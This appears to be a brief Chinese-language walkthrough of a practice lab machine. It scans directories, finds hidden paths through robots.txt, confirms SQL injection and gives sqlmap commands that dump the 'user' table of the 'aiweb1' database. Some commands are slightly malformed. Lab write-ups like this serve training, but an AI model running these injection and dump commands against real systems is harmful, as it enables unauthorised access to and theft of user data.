一.网站查询
二.扫描当前网站目录
扫出有http://172.16.1.88/robots.txt
继续扫这个刚扫出来的,然后得出
我们再访问m3dinfo/info.php和 /se3reTdir777/这俩目录
得到如上图所示
三.进行sql注入
1.判断是否有sql注入
/有结果,有报错
2.利用burp抓包进行注入
将文件复制粘贴到文本中,然后我们托到kali里面继续操作
3.查数据库
$ sqlmap -u'/home/kali/桌面/1.txt' s--batch
4.查表
$ sqlmap -u'/home/kali/桌面/1.txt' -D information_schema --tables --batch
5.查user表中所有数据
$ sqlmap -r '/home/kali/桌面/1.txt' -D aiweb1 -T user --columns --batch
6.将users表中数据dump下来
$ sqlmap -r '/home/kali/桌面/1.txt' -D aiweb1 -T user --columns --dump --batch
